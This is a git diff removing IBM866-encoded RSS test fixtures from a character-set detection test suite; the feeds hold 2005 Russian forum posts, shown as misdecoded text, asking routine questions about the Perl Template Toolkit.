₪אד£®¬ (₪«ן × ¦₪®£® ¥י¥ ¨ ד­¨× «ל­כ© × ג «®£ template)? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-118.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - Thu, 17 Nov 2005 05:29:38 GMT - template Factory - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - כג מבל א¥ «¨§®¢ גל ­¥חג®  ­ «®£¨ח­®¥ ט ¡«®­ד Factory (®₪¨­ £« ¢­© ט ¡«®­, ¨ ¬­®£® ט ¡«®­®¢ ¯א®₪ד×ג®¢),<br /> -‘®®ג¢¥גבג¢¥­­® ¯א¨ ­ ¯¨ב ­¨¨ ט ¡«®­®¢-¯א®₪ד×ג®¢ ה ¡א¨×¨ ו®ג¥«®בל ¡כ ®גב«¥¦¨¢ גל ¨ו ב¯¥ז¨ה¨× ז¨מ. × × ¬¨­¨¬ד¬ ­ «¨ח¨¥ ®¯א¥₪¥«¥­­כו ¡«®×®¢ BLOCK...END ¨ ®¯¥א¥₪¥«¥­­כו ¯¥א¥¬¥­­כו. <br /> -’.¥. ¯¥א¥₪ ¢×«מח¥­¨¥¬ ט ¡«®­  (INCLUDE) נר¬-ג® ®¡א §®¬ &quot;¯א®£®­ןגל ¥£® ­  ב®®ג¢¥גב¢¨¥ ב¯¥ז¨ה¨× ז¨¨ ה ¡א¨×¨&quot;<br /> -®×®¢כאן«בן ¢ ׫ בב-¬®₪ד«¥ Template::Context ­ ט¥« ג ¬ ¯¥א¥¬¥­­דמ ׫ בב  BLKSTACK, ­® ­¨ח¥£® ¢­ןג­®£® ¨§ ­¥ס ­¥ ¬®£ד ¢כג י¨גל, ג¨¯ :<br /> -foreach my $i ($template-&gt;service-&gt;context()-&gt;BLKSTACK) {<br /> -.....<br /> -} - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-117.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - Sun, 6 Nov 2005 18:33:25 GMT -  × ¯®₪£אד§¨גל ¬®₪ד«ל  ¢ג®¬ ג®¬. - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - ¥בגל ¯א®¡«¥¬  ¢ × ¦₪®¬ ג¥¬¯«¥©ג¥ ב®§₪ מ ב¢®© ¯« £¨­.   ו®ח¥גבן ב®§₪ גל ¥£® ¯א¨ ב®§₪ ­¨¨ Template <br /> -<br /> -ב¥©ח ב ¯א®¯¨ב ­®<br /> - PLUGINS=&gt;{<br /> - 'Atma'=&gt;'Atma::TPlugin'<br /> - },<br /> -¨ ¢ × ¦₪®¬ ג¥¬¯«¥©ג¥ ¯¨טד <br /> -[% USE Atma(c) %]<br /> -[% Atma.myfunc(&quot;lalala&quot;)%]<br /> -<br /> -<br /> -ד§­ « חג® ¬®¦­® ¥£® ¯א¨×אדג¨גל ב ¯®¬®ילמ <br /> -¨ ­¥ ¯¨ב גל USE Atma(c)<br /> -# LOAD_PLUGINS =&gt; Atma::TPlugin-&gt;new($self, $self),<br /> -­® ­¥¯®­ןג­כ ¥£® ¯ א ¬¥גאכ ¨ חג®-ג® אד£ «®בל חג® ­¥­ ו®₪¨ג הד­×ז¨מ fetch, ¯®₪¥«¨ג¥בל ®¯כג®¬ × × ­ד¦­® םג® ב₪¥« גל ? - - Dmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-116.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - Tue, 1 Nov 2005 15:03:41 GMT - ˆ ¥יס × ×®© ₪¢¨¦®× ה®אד¬  ¨ב¯®«ל§ד¥ג¥?? - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - ‘ ¡¦:) - - ‘«¥₪®¯כג <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-114.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - Tue, 1 Nov 2005 15:02:06 GMT - ‹®× «¨§ ז¨ן ב ©ג  ב ¯®¬®ילמ TT - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss -  × ב₪¥« גל «®× «¨§ ז¨מ ב ©ג  ב ¯®¬®ילמ TT??<br /> -ן ¢כ­¥ב ¢ב¥ ג¥×בג®¢כ¥ בגא®×¨ ¨§ ט ¡«®­®¢ ¢ ®ג₪¥«ל­כ¥ ה ©«כ ג¨¯ <br /> -messages.en<br /> -[% mess1=&quot;English1&quot; %]<br /> -[% mess2=&quot;English2&quot; %]<br /> -<br /> -messages.ru<br /> -[% mess1=&quot;דבבר©1&quot; %]<br /> -[% mess2=&quot;דבבר©2&quot; %]<br /> -<br /> -  ¢ ט «®­ ו ב®®ג¢¥גבג¢¥­­® ¯א®¯¨ב «<br /> -[% IF lang == &quot;en&quot; ][% INCLUDE messages.en %][% END %]<br /> -&lt;html&gt;<br /> -[% mess1 %]<br /> -&lt;/html&gt;<br /> -₪ד¬ « ¯®₪׫מח גל םג¨ ה ©«כ ¢ § ¢¨ב¨¬®בג¨ ®ג ן§כ×  ­® ג × ­¥ א ¡®ג ¥ג!! ®¦¥ג ×ג® ­¨¡ד₪ל ¯®ב®¢¥גד¥ג?<br /> -ב¯ ב¨¡® - - ‘«¥₪®¯כג <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-113.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - Thu, 27 Oct 2005 11:48:26 GMT - א¥₪בג ¢«¥­¨ן - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - ×ג®-­¨¡ד₪ל ¯®«ל§ד¥ג view? ®ח¥­ל ד₪®¡­ ן טגד× , ב¬די ¥ג ג®«ל×® חג® ®­  ¯®×  ¢ &quot;ם×ב¯¥א¨¬¥­ג «ל­®¬&quot; ¢¨₪¥. ˆ«¨ ¨¬¥¥ג ב¬כ« ¯®«ל§®¢ גלבן? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-112.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - Wed, 28 Sep 2005 15:05:48 GMT - Template Toolkit ¯® winXP - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - „®¡אכ© ₪¥­ל.<br /> -®₪ב× ¦¨ג¥ ¯®¦ «ד©בג  &#8211; × × דבג ­®¢¨גל Template Toolkit ¯® winXP?<br /> - ¨ב¯®«ל§דמ ActivePerl 5.8.6. <br /> -‚׫מח מ PPM. ˆ ­ ט ₪¨ «®£ ב PPM-®¬ ¢כ£«ן₪¨ג ג ×:<br /> -Ppm-&gt; install Template<br /> -Ppm-(®ג¢¥ח ¥ג:) &#8211; ג ×®£® ­ן¬ !!! <br /> -ˆ«¨<br /> -Ppm-&gt; install TemplateToolkit<br /> -Ppm-(®ג¢¥ח ¥ג:) &#8211; ג ×®£® ­ן¬ !!! <br /> - × ¬­¥ דבג ­®¢¨גל Template Toolkit ¯®₪ winXp.<br /> -€«¥×ב¥© - - Washington <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-110.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - Sun, 25 Sep 2005 11:50:06 GMT - fork() ¢ [% PERL %] - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - ®₪ב× ¦¨ג¥, ¯®¦ «דבג , × × ×®אא¥×ג­® ¢כ¯®«­¨גל fork() ¢ ¡«®×¥ [% PERL %] TT?<br /> -<br /> -א®בג® ¢¯®«­ן¥גבן א¥בדאב®¥¬× ן ®¯¥א ז¨ן,   ¯¥א¢®­ ח «ל­כ¥ ₪ ­­כ¥ ­ ₪® ¢®§¢א י גל × × ¬®¦­® ¡כבגא¥¥.<br /> -<br /> -“ ¬¥­ן ¢ ¯¥א¥¬¥­­®© ¢ $stash ב®₪¥א¦¨גלבן ד× § ג¥«ל ­  ×®­­¥×ג × „ ¨ ¬­¥ × ¦¥גלבן, חג® ב ­¨¬ fork ­¥ ב®¢ב¥¬ ×®אא¥×ג­® א ¡®ג ¥ג. ’ ×®¥ ®ידי¥­¨¥, חג® ¯® § ¢¥אט¥­¨¨ ה®א×  םג®ג ×®­­¥×ג § ×אכ¢ ¥גבן. - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-109.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - Wed, 21 Sep 2005 11:45:38 GMT - TT ד₪ «ן¥ג ­ד«¨. - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - ח¥­ל בגא ­­כ© £«מ×, ד¦¥ ₪®«£® ¡למבל, א¥ט¥­¨ן ­¥ ¢¨¦ד.<br /> -¥א¥₪ מ ¢ ט ¡«®­: <br /> -{params}-&gt;{year}-&gt;'2005';<br /> -¢ ט ¡«®­¥ ¯¨טד<br /> -[% params.year %]<br /> -<br /> -¨ ¢¨¦ד 25! ¥ב«¨ ¯¨טד 1998, ¢¨¦ד 1998,   ¥ב«¨ ¯¨טד 20010007, ¢¨¦ד 217!<br /> -<br /> -×ג®-­¨¡ד₪ל בג «×¨¢ «בן? × × «¥ח¨גל? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-108.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - Thu, 15 Sep 2005 12:41:43 GMT - eval() ¢ TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - ‘די¥בג¢ד¥ג «¨ ¢ TT2  ­ «®£ eval() ¢ Perl? ’. ¥. ¥ב«¨ ן ¨¬¥מ ¯א¥¬¥­­דמ ¢ ט ¡«®­¥, §­ ח¥­¨¥ ×®ג®א®© ב®₪¥א¦¨ג ₪¨א¥×ג¨¢כ, ג® × × ¢בג ¢¨גל ¢ ט ¡«®­ §­ ח¥­¨¥ םג®© ¯¥א¥¬¥­­®©, חג®¡כ ₪¨א¥×ג¨¢כ ¡כ«¨ ¢כ¯®«­¥­כ,   ­¥ ¢כ¢®₪¨«¨בל × × ג¥×בג? - - Dionys <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-107.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - Wed, 31 Aug 2005 11:47:31 GMT -  א ¬¥גאכ ¨§ ט ¡«®­  ¢ ט ¡«®­ - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - א¨¢¥ג ¢ב¥¬<br /> -‡ א ­¥¥ ¡« £®₪ א¥­ §  £א ¬®ג­כ© ®ג¢¥ג<br /> -א®¡«¥¬×  ג × ן<br /> - × ¯¥א¥₪ גל ¨§ ט ¡«®­  ¯ א ¬¥גאכ ¢ ט ¡«®­<br /> - ¯א¨¬¥א<br /> -[% INCLUDE tmpl(para1=&gt;value,para2=&gt;value2,...) %] - - plcgi <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-106.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - Mon, 8 Aug 2005 04:57:04 GMT - INCLUDE - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - × × ¯א®¡א®ב¨גל ¯¥א¥¬¥­­דמ ¢® WRAPPER ח¥א¥§ ז¥«כ© «¥ב BLOCK...END ¢«מח¥­­כו ח¥א¥§ INCLUDE.<br /> -¯כג «בן ¢ ¡¨§­¥ב-«®£¨×¥ ח₪¥« גל setter-getter ­® ­¥ × ­ ¥ג ¯®ח¥¬דג®, ו®גן WRAPPER ¢א®₪¥ ®¡א ¡ גכ¢ ¥גבן ¯®ב«¥ ¢ב¥ו ¢«®¦¥­­כו ¡«®×®¢...<br /> -<br /> -PS: PROCESS ­¥ ¯א¥₪« £ גל.<br /> -<br /> -PPS: ®ו®ג  ¢ £« ¢­®¬ ¢א ¯¯¥א¥ ¢כ¢®₪¨גל ב¨בג¥¬­®¥ ב®®¡י¥­¨¥,   ד¦ ¥£® £¥­¥א¨גל ¢® ¢«®¦¥­­כו ט ¡«®­ ו. - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-104.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - Fri, 22 Jul 2005 12:42:52 GMT - × × ב₪¥« גל ×®­× ג¥­ ז¨מ בגא®×? ¨ ­¥ א ¡®ג ¥ג i=i-1 - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - × × ב₪¥« גל ×®­× ג ­¥ז¨מ בגא®×? (®¯¥א ג®א ג®ח×  ¢ ¯¥א«)<br />ב× ¦¥¬, ג ×:<br /><br /><div class="code"><pre> -[%SET i=&quot;aaa&quot;.&quot;bbb&quot; %] - -¯®«דח ¥¬: -unexpected token (.) -</pre></div><br /><br />ˆ ¥י¥. ¥ א ¡®ג ¥ג<br /><div class="code"><pre> -[% i=i-1 %]: - -file error - parse error - articles/index.html line 32: unexpected token (-1) [% i=i-1 %] -</pre></div><br /><br />םג® ה¨ח  ג × ן?<br />¢¥₪ל [% i=i+1 %] א ¡®ג ¥ג!<br />× × ן ¯®­ן« -- ¨ ++ ­¥ בדי¥בג¢דמג :(<br /><br />¢¥אב¨ן template toolkit 2.14 - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-103.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - Mon, 18 Jul 2005 06:24:54 GMT - Bug ¨«¨ Feature ? ¥ א ¡®ג מג $_, $! ¨ ג.¯. - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - ˜ ¡«®­:<br /> -[% PERL %]<br /> - $_ = 'test';<br /> - $stash-&gt;set(msg =&gt; $_);<br /> -[% END %]<br /> -&lt;div&gt;[% msg %]&lt;/div&gt;<br /> ---------------------<br /> -tpage --eval_perl<br /> -‚כ₪ סג <br /> -Segmentation fault - - ¨×®« ©  ×ב¨¬®¢ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-100.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - Thu, 14 Jul 2005 07:48:40 GMT - ¯¥א ז¨ן ₪¥«¥­¨ן (¢ ט ¡«®­¥) - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss -  ¯א¨¬¥א<br /> -[% a=10 %]<br /> -[% b=5 %]<br /> -<br /> -[% c=a/b %]<br /> -<br /> -‚כ₪ ¥ג ®ט¨¡×ד. ‚ב¥ ₪אד£¨¥ ®¯¥א ז¨¨ ­®א¬ «ל­®.<br /> -‚ ח¥¬ ¯א¨ח¨­ ? - - ‘¥א£¥© <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-99.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - Thu, 14 Jul 2005 03:03:52 GMT - Unit Tests - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - ג® ¨ × × ¯¨ט¥ג UnitTest-כ ₪«ן ב¢®¨ו ט ¡«®­®¢.<br /> -“ ¬¥­ן ¯®×  UnitTest- ¬¨ ¯®×אכ¢ ¥גבן ג®«ל×® ¡¨§­¥ב «®£¨×  (×®ג®א ן ‚‘ ¢כ­¥ב¥­  ¢ *.pm)<br /> -ד × × ד ¢ ב ­ בח¥ג הד­×ז¨®­ «ל­כו ג¥בג®¢, ®ב®¡¥­­® WEB-¨­ג¥אה¥©ב ? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-98.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - Mon, 11 Jul 2005 08:56:40 GMT - mod_perl, ®ב¢®¡®¦₪ ¥גבן «¨ ¯ ¬ןגל ¢­דגא¨ ט ¡«®­  TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - …בגל handler ­  ¬®₪¯¥א«¥ <br /> -¢ ×א גז¥.<br /> -<br /> -package My::controller;<br /> -our $c; # £«®¡ «ל­ ן ¯¥א¥¬¥­­ ן, וםט ¢ ×®ג®א®¬ ¢ב¥ חג® ­¥®¡ו®₪¨¬®<br /> -<br /> -sub handler($$){<br /> - my $class = shift;<br /> - my $r = shift;<br /> -<br /> - $c ||= $class-&gt;new(); # ¥ב«¨ ד¦¥ ¡כ« ב®§₪ ­ ¯א®ז¥בב, ג® ¡®«לט¥ ­¥ ­ד¦­® ₪¥« גל new.<br /> -<br /> - $c-&gt;{t}-&gt;process(&quot;template.tmpl&quot;, $c); # ¯א®ז¥בב¨¬ ג¥¬¯«¥©ג ¯¥א¥₪ ¢ ן םג®ג ¦¥ ×®­גא®««¥א ¢ × ח¥בג¢¥ ¯ א ¬¥גא®¢.<br /> -}<br /> -<br /> -##################<br /> -# ב®§₪ ¥¬ ®¡ך¥×ג ¢ ¯ן¬ןג¨<br /> -##################<br /> -sub new{<br /> - bless $self, $class<br /> -<br /> - $self-&gt;{dbh} = DBI-&gt;connect(.........); # ₪¥« ¥¬ ×®­­¥×ג<br /> - $self-&gt;{t} = new Template(.........); # ₪¥« ¥¬ ג¥¬¯«¥©גכ <br /> - $self-&gt;{cgi} = new CGI; <br /> -<br /> - $self-&gt;{site_path} = &quot;/la/bla/bla/la&quot;;<br /> - $self-&gt;{cgi_path} =&quot;/d/sfd/fs/&quot;;<br /> - return $self,<br /> -}<br /> -<br /> -<br /> -¢ ט ¡«®­¥ template.tmpl<br /> -ב®§₪ מגבן ¯¥א¥¬¥­­כ¥ [% my_var = &quot;12345&quot; %]<br /> -<br /> -®ח¨י ¥גבן «¨ ¯ן¬ןגל ×®£₪  ®ג¯א®ז¥בב¨גבן ט ¡«®­?<br /> -ג.¥. ¡ד₪¥ג «¨ $c-&gt;{my_var} ¯דבגכ¬ ¯א¨ ב«¥₪דמי¥¬ § ¯א®ב¥? - - trdmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-97.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - Fri, 8 Jul 2005 10:07:01 GMT - ¥ ¯®× §כ¢ מגלבן ¯א ¢¨«ל­® בגא®×¨ ¢ UTF-8 ¢כ¡א ­כ¥ ¨§ ¡ §כ - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - ‚כ¡¨א מ ₪ ­­כ¥ ¨§ ¡ §כ MySQL. „ ­­כ¥ ¢ UTF-8.<br />…ב«¨ ב₪¥« גל<br /><div class="code"><pre> -print $string_from_database; -</pre></div><br />ג® UTF-8 ב¨¬¢®«כ ¢כ¢®₪ןגבן ¯א ¢¨«ל­®.<br />€ ¥ב«¨ ח¥א¥§ ’’, ג® UTF-8 ב¨¬¢®«כ ¢  ¡א × ₪ ¡א¥.<br />ˆ םג® ד ¬¥­ן «®× «ל­® ¯®₪ ‚¨­₪®©,<br />­  ב¥א¢¥א¥ ¯®₪ ­¨×ב ¢ב¥ ­®א¬ «ל­®. - - rchumak <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-95.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - Wed, 29 Jun 2005 07:06:16 GMT - ¥א¥₪ ח  ¯ א ¬¥גא®¢ ¨§ ¯« £¨­  - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - –¨×«<br /> -@fld[$n] = ({<br /> -id =&gt; $id,<br /> -type =&gt; $type,<br /> -pr =&gt; \@f,<br /> -});<br /> -<br /> -n++<br /> -®­¥ז–¨×« <br /> -<br /> -return @fld<br /> -<br /> -<br /> -א®¡«¥¬  ¢ ג®¬, חג® ¬ בב¨¢ @f, דבג ­ ¢«¨¢ ¥גבן ®₪¨­ ­  ¢ב¥ ם«¥¬¥­גכ @fld<br /> - × םג® ¬®¦­® ®¡®©ג¨? - - ‘¥א£¥© <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-93.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - - - diff --git a/chardet/tests/IBM866/forum.template-toolkit.ru.4.xml b/chardet/tests/IBM866/forum.template-toolkit.ru.4.xml deleted file mode 100644 index 7e465c2..0000000 --- a/chardet/tests/IBM866/forum.template-toolkit.ru.4.xml +++ /dev/null @@ -1,130 +0,0 @@ - - - - - ”®אד¬כ Template Toolkit : ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_forum/forum_id-4.html?rss - Template Toolkit - ¡כבגא ן, ¬®י­ ן ¨ א בט¨אן¥¬ ן ב¨בג¥¬  ®¡א ¡®גר ט ¡«®­®¢.   ב ©ג¥ א ¡®ג ¥ג ה®אד¬, ¢ ×®ג®א®¬ ®¡בד¦₪ מגבן ¢®¯א®בכ ¨ב¯®«ל§®¢ ­¨ן ¡¨¡«¨®ג¥×¨ ¯® א ¡®ג¥ ב ט ¡«®­ ¬¨. א¥₪«®¦¥­¨ן ¯® א ¡®ג¥ ה®אד¬ . א£ ­¨§ ז¨ן ­®¢כו × ג¥£®א¨© ¨ ה®אד¬®¢. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Tue, 3 Jan 2006 08:27:57 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט ¡«®­כ ¢ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - Tue, 3 Jan 2006 08:27:57 GMT - ‘ ®¢כ¬ ƒ®₪®¬ - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - ®§₪א ¢«ןמ ¢ב¥ו ¯®ב¥ג¨ג¥«¥© םג®£® ­¥¡®«לט®£®, ­® ­ ₪¥מבל ¯®«¥§­®£®, ב ©ג  ב ­ בגד¯¨¢ט¨¬ 2006 £®₪®¬! †¥« מ ­®¢כו ג¢®אח¥ברו ד₪ ח ¨ ­ ו®₪®×. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-123.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - Thu, 20 Jan 2005 12:10:22 GMT - XUL ®¡«®¦×  - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - „«ן ¯®«ל§®¢ ג¥«¥© ¡א®ד§¥א®¢ Mozilla ב₪¥« « <a target="_blank" href="http://template-toolkit.ru/xul/index.xul">XUL ®¡«®¦×ד</a>. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-57.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - Wed, 15 Dec 2004 08:44:32 GMT - ¥ ¯א¨ו®₪¨ג ×®₪ ₪«ן § ¢¥אט¥­¨ן א¥£¨בגא ז¨¨ - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - ‡₪א ¢בג¢ד©ג¥!<br /> -<br /> -­¥ ­¥ ¯א¨ו®₪¨ג ×®₪ ₪«ן § ¢¥אט¥­¨ן א¥£¨בגא ז¨¨ :(. ¥£¨בגא¨א®¢ «בן 2 א §  ב א §­כ¬¨ ¯®חג.  ₪א¥ב ¬¨, ­® םהה¥×ג ­ד«¥¢®© :(. - - ¨×®« © ‚. <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-44.html - ¡בד¦₪¥­¨¥ ה®אד¬  - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - Sat, 4 Dec 2004 22:08:26 GMT - RDF ב«ד¦¡  § £®«®¢×®¢ - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss -   ה®אד¬¥ ₪®¡ ¢«¥­  <span style="font-weight:bold">RDF ב«ד¦¡  § £®«®¢×®¢</span>. ג  ב«ד¦¡  £®ג®¢¨ג ה ©«כ ב § £®«®¢× ¬¨ ­®¢כו ג¥¬, ®ג×אכגכו ¢ ה®אד¬ ו, ¢ ה®א¬ ג¥ XML/RDF. ‘ ¯®¬®ילמ RDF ב«ד¦¡כ ¬®¦­® ®א£ ­¨§®¢ גל ¯®₪¯¨ב×ד ­  ­®¢כ¥ ג¥¬כ, ®ג×אכגכ¥ ¢ ה®אד¬ ו.<br /><br />‚ ­ בג®ןי¨© ¬®¬¥­ג ₪®בגד¯­כ ב«¥₪דמי¨¥ ¯®₪¯¨בר <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_1.rdf">‡­ ×®¬בג¢® ב Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_6.rdf">®¢®בג¨ Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_4.rdf">¡בד¦₪¥­¨¥ ה®אד¬ </a>.<br /><br />„«ן ®גב«¥¦¨¢ ­¨ן ­®¢כו ג¥¬ ¨ חג¥­¨ן § £®«®¢×®¢ ¬®¦­® ¨ב¯®«ל§®¢ גל ב¯¥ז¨ «ל­כ¥ ¯א®£א ¬¬כ ¨ ב«ד¦¡כ, ­ ¯א¨¬¥א: <a target="_blank" href="http://www.activerefresh.com/">Abilon</a>, <a target="_blank" href="http://www.feedreader.com/">FeedReader</a>, <a target="_blank" href="http://www.yole.ru/projects/syndirella/">Syndirella</a>, <a target="_blank" href="http://blogspace.com/rss/readers">RSS Readers</a>, <a target="_blank" href="http://www.watznew.com/">WatzNew</a>.<br /><br />®«ל§®¢ ג¥«¨ ¡א®ד§¥א  <span style="font-weight:bold"><span style="color: orange">Firefox</span></span> (¢¥אב¨¨ 0.8 ¨ בג אט¥) ג ×¦¥ ¬®£דג ­ בגא®¨גל ¯®₪¯¨ב×ד ח¥א¥§ <span style="font-weight:bold">Live Bookmark</span>. „«ן םג®£® ­ד¦­® § ©ג¨ ¢ ¢כ¡א ­­כ© ה®אד¬ (­ 